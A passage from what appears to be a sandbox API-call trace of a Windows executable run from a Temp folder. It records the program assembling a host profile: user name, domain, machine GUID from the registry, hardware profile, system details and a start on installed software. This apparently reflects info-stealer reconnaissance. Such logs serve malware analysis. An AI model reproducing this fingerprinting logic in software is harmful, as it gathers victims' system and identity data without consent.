C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: " [0175.860] GetProcessHeap () returned 0x4c0000 [0175.860] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x104) returned 0x528148 [0175.860] GetUserNameA (in: lpBuffer=0x528148, pcbBuffer=0x1987ec | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1987ec) returned 1 [0175.861] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: ", lpString2="RDhJ0CNFevzX" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX" [0175.861] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\n" [0175.861] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\n", lpString2="Domain name: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: " [0175.861] DsRoleGetPrimaryDomainInformation (in: lpServer=0x0, InfoLevel=0x1, Buffer=0x1987e8 | out: Buffer=0x1987e8*=0x505c10*(MachineRole=0x0, Flags=0x0, DomainNameFlat="WORKGROUP", DomainNameDns=0x0, DomainForestName=0x0, DomainGuid.Data1=0x0, DomainGuid.Data2=0x0, DomainGuid.Data3=0x0, DomainGuid.Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0175.864] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ", lpString2="?" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?" [0175.864] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\n" [0175.864] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\n", lpString2="MachineID: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: " [0175.864] GetProcessHeap () returned 0x4c0000 [0175.864] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x104) returned 0x528258 [0175.864] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x1987ec | out: phkResult=0x1987ec*=0x350) returned 0x0 [0175.864] RegQueryValueExA (in: hKey=0x350, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x528258, lpcbData=0x1987e8*=0xff | out: lpType=0x0, lpData=0x528258*=0x30, lpcbData=0x1987e8*=0x25) returned 0x0 [0175.865] RegCloseKey (hKey=0x350) returned 0x0 [0175.865] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: ", lpString2="03845cb8-7441-4a2f-8c0f-c90408af5778" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778" [0175.865] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\n" [0175.865] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\n", lpString2="GUID: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: " [0175.867] GetCurrentHwProfileA (in: lpHwProfileInfo=0x198770 | out: lpHwProfileInfo=0x198770) returned 1 [0175.867] GetProcessHeap () returned 0x4c0000 [0175.867] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x64) returned 0x5011e8 [0175.868] lstrcatA (in: lpString1="", lpString2="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" | out: lpString1="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}") returned="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" [0175.868] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: ", lpString2="{c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}" [0175.868] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}", lpString2="\n\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\n" [0175.868] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\n", lpString2="Installed Software: " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: " [0175.868] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: ", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: 